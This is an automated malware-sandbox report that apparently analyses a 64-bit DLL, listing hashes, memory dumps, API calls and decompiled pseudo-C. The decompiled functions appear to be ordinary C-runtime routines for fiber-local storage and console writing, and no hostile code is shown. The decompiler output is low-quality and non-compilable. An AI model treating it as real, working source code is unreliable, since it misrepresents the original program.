Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction ID: 202f475303f7da37817a64b1b833fe1bbdd36b209cc940da674033cbaa56330a
Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction Fuzzy Hash: CA11427BE5CA7301F6783374F55637912416F5B3A4F08CEB4E96F162E6AE2C68894104

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6BB14 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFA0AE69403,?,?,00000000,00007FFA0AE6969E,?,?,?,?,?,00007FFA0AE6962A), ref: 00007FFA0AE6BB33
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE69403,?,?,00000000,00007FFA0AE6969E,?,?,?,?,?,00007FFA0AE6962A), ref: 00007FFA0AE6BB52
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE69403,?,?,00000000,00007FFA0AE6969E,?,?,?,?,?,00007FFA0AE6962A), ref: 00007FFA0AE6BB7A
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE69403,?,?,00000000,00007FFA0AE6969E,?,?,?,?,?,00007FFA0AE6962A), ref: 00007FFA0AE6BB8B
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE69403,?,?,00000000,00007FFA0AE6969E,?,?,?,?,?,00007FFA0AE6962A), ref: 00007FFA0AE6BB9C

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
Instruction ID: 22261c6bf07d7fafff0844622534df78453f59dd07d61006c6901b12f0ba52bb
Opcode Fuzzy Hash: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
Instruction Fuzzy Hash: D9115C32F4CA6642FA58B731F99223963425F467F0F54CAB4D82D8B6DAFE2CB4018300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6B9A8 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFA0AE6B9B9
FlsSetValue.KERNEL32 ref: 00007FFA0AE6B9D8
FlsSetValue.KERNEL32 ref: 00007FFA0AE6BA00
FlsSetValue.KERNEL32 ref: 00007FFA0AE6BA11
FlsSetValue.KERNEL32 ref: 00007FFA0AE6BA22

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
Instruction ID: 3f195d4e8249ad56f552ff316b1babe942bf5b8af64aa3ca8ef3c76e2495574b
Opcode Fuzzy Hash: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
Instruction Fuzzy Hash: 6211E832E88A6742F968B731F86627912414F477E4F58CFB9D83E8A2D6FD2CB4419204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE70958 Relevance: 6.3, APIs: 4, Instructions: 305
fileCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFA7FFA0AE70958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t181;
				signed int _t186;
				signed int _t193;
				signed int _t198;
				void* _t212;
				signed char _t213;
				void* _t263;
				signed long long _t264;
				signed long long _t267;
				long long _t269;
				signed long long _t271;
				long long _t276;
				long long _t278;
				long long _t280;
				intOrPtr* _t289;
				intOrPtr _t294;
				long long _t295;
				long long _t318;
				void* _t326;
				long long _t327;
				void* _t328;
				long long _t329;
				long long _t331;
				signed char* _t332;
				signed char* _t333;
				signed char* _t334;
				intOrPtr* _t335;
				void* _t336;
				void* _t337;
				signed long long _t338;
				intOrPtr _t341;
				signed long long _t343;
				void* _t345;
				intOrPtr* _t347;
				intOrPtr _t351;
				signed long long _t356;
				signed long long _t359;
				signed long long _t361;
				void* _t364;
				long long _t365;
				long long _t367;
				char _t368;
				void* _t372;
				signed char* _t373;
				signed long long _t375;

				_t263 = _t337;
				_t336 = _t263 - 0x57;
				_t338 = _t337 - 0xe0;
				 *((long long*)(_t336 - 9)) = 0xfffffffe;
				 *((long long*)(_t263 + 8)) = __rbx;
				_t264 =  *0xaede008; // 0xa3acf2c2a32b
				 *(_t336 + 0x17) = _t264 ^ _t338;
				 *((long long*)(_t336 - 0x49)) = __r8;
				_t289 = __rcx;
				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
				 *((long long*)(_t336 - 0x51)) = _t367;
				 *(_t336 - 0x19) = __edx;
				_t267 = __edx >> 6;
				 *(_t336 - 0x59) = _t267;
				 *(_t336 - 0x11) = __edx;
				_t375 = __edx + __edx * 8;
				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
				 *((long long*)(_t336 - 0x29)) = _t269;
				r12d = r9d;
				_t365 = _t364 + __r8;
				 *((long long*)(_t336 - 0x71)) = _t365;
				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0xae709f8;
				0xae69140();
				_t294 =  *((intOrPtr*)(_t367 + 0x18));
				r8d =  *(_t294 + 0xc);
				 *(_t336 - 0x5d) = r8d;
				 *((long long*)(__rcx)) = _t269;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0xae70db8;
				_t271 = __edx >> 6;
				 *(_t336 - 0x21) = _t271;
				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
				r12d = 1;
				if (r8d != 0xfde9) goto 0xae70bc0;
				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t271 * 8));
				if ( *_t347 == dil) goto 0xae70a74;
				_t372 = _t329 + 1;
				if (_t372 - 5 < 0) goto 0xae70a61;
				if (_t372 == 0) goto 0xae70b52;
				r12d =  *((char*)(_t294 + 0x7ffa0aede8f0));
				r12d = r12d + 1;
				_t181 = r12d - 1;
				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
				_t341 = _t181;
				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0xae70d27;
				_t295 = _t329;
				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
				if (_t295 + 1 - _t372 < 0) goto 0xae70ab9;
				if (_t341 <= 0) goto 0xae70aea;
				E00007FFA7FFA0AE664D0( *( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
				_t318 = _t329;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
				if (_t318 + 1 - _t372 < 0) goto 0xae70aed;
				 *((long long*)(_t336 - 0x41)) = _t329;
				_t276 = _t336 - 1;
				 *((long long*)(_t336 - 0x39)) = _t276;
				_t186 = (0 | r12d == 0x00000004) + 1;
				r12d = _t186;
				r8d = _t186;
				 *((long long*)(_t338 + 0x20)) = _t367;
				E00007FFA7FFA0AE71744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
				if (_t276 == 0xffffffff) goto 0xae70db8;
				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
				goto 0xae70c55;
				_t368 =  *((char*)(_t276 + 0x7ffa0aede8f0));
				_t212 = _t368 + 1;
				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
				if (_t212 - _t343 > 0) goto 0xae70d55;
				 *((long long*)(_t336 - 0x69)) = _t329;
				 *((long long*)(_t336 - 0x31)) = _t331;
				_t193 = (0 | _t212 == 0x00000004) + 1;
				r14d = _t193;
				r8d = _t193;
				_t278 =  *((intOrPtr*)(_t336 - 0x51));
				 *((long long*)(_t338 + 0x20)) = _t278;
				E00007FFA7FFA0AE71744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
				if (_t278 == 0xffffffff) goto 0xae70db8;
				_t332 = _t331 + _t368;
				r12d = r14d;
				goto 0xae70c55;
				_t359 =  *(_t336 - 0x59);
				_t351 =  *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t359 * 8));
				_t213 =  *(_t351 + 0x3d + _t375 * 8);
				if ((_t213 & 0x00000004) == 0) goto 0xae70bf7;
				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
				 *((char*)(_t336 + 8)) =  *_t332;
				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
				r8d = 2;
				goto 0xae70c40;
				r8d =  *_t332 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0xae70c3a;
				_t373 =  &(_t332[1]);
				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0xae70d93;
				r8d = 2;
				if (E00007FFA7FFA0AE6E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0xae70db8;
				_t333 = _t373;
				goto 0xae70c55;
				_t198 = E00007FFA7FFA0AE6E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
				if (_t198 == 0xffffffff) goto 0xae70db8;
				_t334 =  &(_t333[1]);
				 *((long long*)(_t338 + 0x38)) = _t329;
				 *((long long*)(_t338 + 0x30)) = _t329;
				 *((intOrPtr*)(_t338 + 0x28)) = 5;
				_t280 = _t336 + 0xf;
				 *((long long*)(_t338 + 0x20)) = _t280;
				r9d = r12d;
				_t345 = _t336 - 0x7d;
				E00007FFA7FFA0AE6D698();
				r14d = _t198;
				if (_t198 == 0) goto 0xae70db8;
				 *((long long*)(_t338 + 0x20)) = _t329;
				r8d = _t198;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xae70db0;
				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0xae70db8;
				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0xae70d10;
				 *((short*)(_t338 + 0x40)) = 0xd;
				 *((long long*)(_t338 + 0x20)) = _t329;
				_t128 = _t280 - 0xc; // 0x1
				r8d = _t128;
				_t326 = _t338 + 0x40;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xae70db0;
				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0xae70db8;
				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0xae70db8;
				r8d =  *(_t336 - 0x5d);
				goto 0xae70a23;
				if (_t326 <= 0) goto 0xae70d50;
				_t335 = _t334 - _t373;
				 *((char*)( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
				if (1 - _t326 < 0) goto 0xae70d2f;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
				goto 0xae70db8;
				if (_t345 <= 0) goto 0xae70d8d;
				_t327 = _t329;
				_t361 =  *(_t336 - 0x19) >> 6;
				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
				 *((char*)( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
				_t328 = _t327 + 1;
				if (2 - _t345 < 0) goto 0xae70d6d;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
				goto 0xae70db8;
				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
				 *( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
				_t174 = _t328 + 1; // 0x1
				 *((intOrPtr*)(_t289 + 4)) = _t174;
				goto 0xae70db8;
				 *_t289 = GetLastError();
				return E00007FFA7FFA0AE63A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
			}

0x7ffa0ae70958
0x7ffa0ae70966
0x7ffa0ae7096a
0x7ffa0ae70971
0x7ffa0ae70979
0x7ffa0ae7097d
0x7ffa0ae70987
0x7ffa0ae7098e
0x7ffa0ae70995
0x7ffa0ae70998
0x7ffa0ae7099c
0x7ffa0ae709a3
0x7ffa0ae709aa
0x7ffa0ae709ae
0x7ffa0ae709bc
0x7ffa0ae709c0
0x7ffa0ae709cc
0x7ffa0ae709d1
0x7ffa0ae709d5
0x7ffa0ae709d8
0x7ffa0ae709db
0x7ffa0ae709e5
0x7ffa0ae709ee
0x7ffa0ae709f3
0x7ffa0ae709f8
0x7ffa0ae709fc
0x7ffa0ae70a00
0x7ffa0ae70a06
0x7ffa0ae70a09
0x7ffa0ae70a10
0x7ffa0ae70a19
0x7ffa0ae70a1d
0x7ffa0ae70a25
0x7ffa0ae70a29
0x7ffa0ae70a2c
0x7ffa0ae70a40
0x7ffa0ae70a5b
0x7ffa0ae70a64
0x7ffa0ae70a68
0x7ffa0ae70a72
0x7ffa0ae70a77
0x7ffa0ae70a8f
0x7ffa0ae70a98
0x7ffa0ae70a9e
0x7ffa0ae70aa0
0x7ffa0ae70aaa
0x7ffa0ae70ab0
0x7ffa0ae70ab6
0x7ffa0ae70abc
0x7ffa0ae70ac9
0x7ffa0ae70ace
0x7ffa0ae70ada
0x7ffa0ae70aea
0x7ffa0ae70af8
0x7ffa0ae70b03
0x7ffa0ae70b05
0x7ffa0ae70b09
0x7ffa0ae70b0d
0x7ffa0ae70b1a
0x7ffa0ae70b1c
0x7ffa0ae70b1f
0x7ffa0ae70b22
0x7ffa0ae70b33
0x7ffa0ae70b3c
0x7ffa0ae70b4a
0x7ffa0ae70b4d
0x7ffa0ae70b55
0x7ffa0ae70b5e
0x7ffa0ae70b66
0x7ffa0ae70b6f
0x7ffa0ae70b75
0x7ffa0ae70b79
0x7ffa0ae70b85
0x7ffa0ae70b87
0x7ffa0ae70b8a
0x7ffa0ae70b8d
0x7ffa0ae70b91
0x7ffa0ae70ba2
0x7ffa0ae70bab
0x7ffa0ae70bb1
0x7ffa0ae70bb4
0x7ffa0ae70bbb
0x7ffa0ae70bc0
0x7ffa0ae70bc4
0x7ffa0ae70bcc
0x7ffa0ae70bd4
0x7ffa0ae70bdb
0x7ffa0ae70be0
0x7ffa0ae70be6
0x7ffa0ae70beb
0x7ffa0ae70bf5
0x7ffa0ae70bf7
0x7ffa0ae70c07
0x7ffa0ae70c09
0x7ffa0ae70c11
0x7ffa0ae70c1a
0x7ffa0ae70c2f
0x7ffa0ae70c35
0x7ffa0ae70c38
0x7ffa0ae70c47
0x7ffa0ae70c4f
0x7ffa0ae70c55
0x7ffa0ae70c58
0x7ffa0ae70c5d
0x7ffa0ae70c62
0x7ffa0ae70c6a
0x7ffa0ae70c6e
0x7ffa0ae70c73
0x7ffa0ae70c76
0x7ffa0ae70c7f
0x7ffa0ae70c84
0x7ffa0ae70c89
0x7ffa0ae70c8f
0x7ffa0ae70c98
0x7ffa0ae70cae
0x7ffa0ae70cbc
0x7ffa0ae70cc3
0x7ffa0ae70cce
0x7ffa0ae70cd5
0x7ffa0ae70cda
0x7ffa0ae70ce3
0x7ffa0ae70ce3
0x7ffa0ae70ce7
0x7ffa0ae70cf7
0x7ffa0ae70d01
0x7ffa0ae70d07
0x7ffa0ae70d0a
0x7ffa0ae70d14
0x7ffa0ae70d1e
0x7ffa0ae70d22
0x7ffa0ae70d2a
0x7ffa0ae70d2c
0x7ffa0ae70d3e
0x7ffa0ae70d4e
0x7ffa0ae70d50
0x7ffa0ae70d53
0x7ffa0ae70d58
0x7ffa0ae70d5a
0x7ffa0ae70d61
0x7ffa0ae70d69
0x7ffa0ae70d7c
0x7ffa0ae70d82
0x7ffa0ae70d8b
0x7ffa0ae70d8d
0x7ffa0ae70d91
0x7ffa0ae70d95
0x7ffa0ae70da2
0x7ffa0ae70da8
0x7ffa0ae70dab
0x7ffa0ae70dae
0x7ffa0ae70db6
0x7ffa0ae70de1

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFA0AE709DF
WriteFile.KERNEL32 ref: 00007FFA0AE70CA6
WriteFile.KERNEL32 ref: 00007FFA0AE70CEF
GetLastError.KERNEL32 ref: 00007FFA0AE70DB0

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction ID: 94e2e337c297d290a5423d5d2d6e762b66a2ccd3596ecde91775e8c4cd9110b1
Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction Fuzzy Hash: BED1C133B08B918AE751DF79E4802AC37A1EB46798B148276CF5D57B99EE38D406C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE7129C Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FFA7FFA0AE7129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed short _v80;
				void* _v92;
				signed int _v96;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				signed int _v120;
				long long _v128;
				signed int _v136;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed int _t128;
				intOrPtr _t146;
				intOrPtr _t147;
				void* _t169;
				signed long long _t182;
				signed long long _t186;
				signed long long _t189;
				signed long long _t208;
				signed int _t209;
				void* _t210;
				void* _t212;
				void* _t228;
				signed long long _t229;
				signed short* _t230;
				void* _t231;
				signed short* _t232;

				_t122 = __ebx;
				r15d = r8d;
				_t186 = __r9;
				_t230 = __rdx;
				if (r8d == 0) goto 0xae71599;
				if (__rdx != 0) goto 0xae71303;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v128 = __r9;
				_v136 = _t209;
				E00007FFA7FFA0AE69674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
				goto 0xae7159b;
				_t189 = __ecx >> 6;
				_v120 = _t189;
				_t229 = __ecx + __ecx * 8;
				if (_t210 - 1 - 1 > 0) goto 0xae71339;
				if (( !r15d & 0x00000001) == 0) goto 0xae712cc;
				if (( *( *((intOrPtr*)(0xaedf940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0xae7134f;
				r8d = 0x7ffa0aedf942;
				E00007FFA7FFA0AE71E38(r12d);
				_v96 = _t209;
				if (E00007FFA7FFA0AE716A0(r12d, __ecx) == 0) goto 0xae71485;
				if ( *((intOrPtr*)( *((intOrPtr*)(0xaedf940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0xae71485;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0xae71396;
				0xae69140();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0xae713b2;
				_t182 =  *((intOrPtr*)(0xaedf940 + _v120 * 8));
				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0xae71485;
				if (GetConsoleMode(??, ??) == 0) goto 0xae7147a;
				if (sil == 0) goto 0xae71457;
				sil = sil - 1;
				if (sil - 1 > 0) goto 0xae7151e;
				_t228 = _t230 + _t231;
				_v112 = _t209;
				_t232 = _t230;
				if (_t230 - _t228 >= 0) goto 0xae71514;
				_v80 =  *_t232 & 0x0000ffff;
				_t107 = E00007FFA7FFA0AE71E40( *_t232 & 0xffff);
				_t128 = _v80 & 0x0000ffff;
				if (_t107 != _t128) goto 0xae71449;
				_t146 = _v108 + 2;
				_v108 = _t146;
				if (_t128 != 0xa) goto 0xae7143a;
				if (E00007FFA7FFA0AE71E40(0xd) != 0xd) goto 0xae71449;
				_t147 = _t146 + 1;
				_v108 = _t147;
				if ( &(_t232[1]) - _t228 >= 0) goto 0xae71514;
				goto 0xae713fa;
				_v112 = GetLastError();
				goto 0xae71514;
				r9d = r15d;
				_v136 = __r9;
				E00007FFA7FFA0AE70958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
				asm("movsd xmm0, [eax]");
				goto 0xae71519;
				if ( *((intOrPtr*)( *((intOrPtr*)(0xaedf940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0xae714e1;
				_t169 = sil;
				if (_t169 == 0) goto 0xae714cd;
				if (_t169 == 0) goto 0xae714b9;
				if (_t147 - 1 != 1) goto 0xae71529;
				r9d = r15d;
				E00007FFA7FFA0AE70EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0xae7146e;
				r9d = r15d;
				E00007FFA7FFA0AE71004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
				goto 0xae7146e;
				r9d = r15d;
				E00007FFA7FFA0AE70DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0xae7146e;
				r8d = r15d;
				_v136 = _v136 & _t182;
				_v112 = _t182;
				_v104 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0xae71511;
				_t116 = GetLastError();
				_v112 = _t116;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				if (_t116 != 0) goto 0xae71592;
				_t117 = _v96;
				if (_t117 == 0) goto 0xae71568;
				if (_t117 != 5) goto 0xae71558;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
				 *((char*)(_t186 + 0x38)) = 1;
				 *(_t186 + 0x34) = _t117;
				goto 0xae712fb;
				_t208 = _t186;
				E00007FFA7FFA0AE6B3DC(_v96, _t208);
				goto 0xae712fb;
				if (( *( *((intOrPtr*)(0xaedf940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0xae7157a;
				if ( *_t230 == 0x1a) goto 0xae71599;
				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
				 *((char*)(_t186 + 0x38)) = 1;
				goto 0xae712fb;
				goto 0xae7159b;
				return 0;
			}

0x7ffa0ae7129c
0x7ffa0ae712b2
0x7ffa0ae712b8
0x7ffa0ae712bb
0x7ffa0ae712c1
0x7ffa0ae712ca
0x7ffa0ae712cc
0x7ffa0ae712d1
0x7ffa0ae712d4
0x7ffa0ae712da
0x7ffa0ae712e1
0x7ffa0ae712e9
0x7ffa0ae712ec
0x7ffa0ae712f1
0x7ffa0ae712f6
0x7ffa0ae712fe
0x7ffa0ae71313
0x7ffa0ae71317
0x7ffa0ae7131b
0x7ffa0ae7132e
0x7ffa0ae71337
0x7ffa0ae7133f
0x7ffa0ae71346
0x7ffa0ae7134a
0x7ffa0ae71352
0x7ffa0ae71368
0x7ffa0ae71377
0x7ffa0ae71381
0x7ffa0ae71386
0x7ffa0ae713a1
0x7ffa0ae713a3
0x7ffa0ae713ac
0x7ffa0ae713c7
0x7ffa0ae713d0
0x7ffa0ae713d6
0x7ffa0ae713dd
0x7ffa0ae713e3
0x7ffa0ae713e7
0x7ffa0ae713eb
0x7ffa0ae713f1
0x7ffa0ae71401
0x7ffa0ae71405
0x7ffa0ae7140a
0x7ffa0ae71411
0x7ffa0ae71413
0x7ffa0ae71416
0x7ffa0ae7141d
0x7ffa0ae71431
0x7ffa0ae71433
0x7ffa0ae71435
0x7ffa0ae71441
0x7ffa0ae71447
0x7ffa0ae7144f
0x7ffa0ae71452
0x7ffa0ae71457
0x7ffa0ae7145a
0x7ffa0ae71469
0x7ffa0ae7146e
0x7ffa0ae71475
0x7ffa0ae7148e
0x7ffa0ae71492
0x7ffa0ae71495
0x7ffa0ae7149a
0x7ffa0ae7149f
0x7ffa0ae714a5
0x7ffa0ae714b2
0x7ffa0ae714b7
0x7ffa0ae714b9
0x7ffa0ae714c6
0x7ffa0ae714cb
0x7ffa0ae714cd
0x7ffa0ae714da
0x7ffa0ae714df
0x7ffa0ae714ec
0x7ffa0ae714ef
0x7ffa0ae714f7
0x7ffa0ae714fb
0x7ffa0ae71506
0x7ffa0ae71508
0x7ffa0ae7150e
0x7ffa0ae71514
0x7ffa0ae71519
0x7ffa0ae71533
0x7ffa0ae71535
0x7ffa0ae7153a
0x7ffa0ae7153f
0x7ffa0ae71541
0x7ffa0ae71545
0x7ffa0ae7154c
0x7ffa0ae71550
0x7ffa0ae71553
0x7ffa0ae7155b
0x7ffa0ae7155e
0x7ffa0ae71563
0x7ffa0ae71572
0x7ffa0ae71578
0x7ffa0ae7157a
0x7ffa0ae7157e
0x7ffa0ae71582
0x7ffa0ae71589
0x7ffa0ae7158d
0x7ffa0ae71597
0x7ffa0ae715ab

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFA0AE7123C), ref: 00007FFA0AE713BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFA0AE7123C), ref: 00007FFA0AE71449

Memory Dump Source

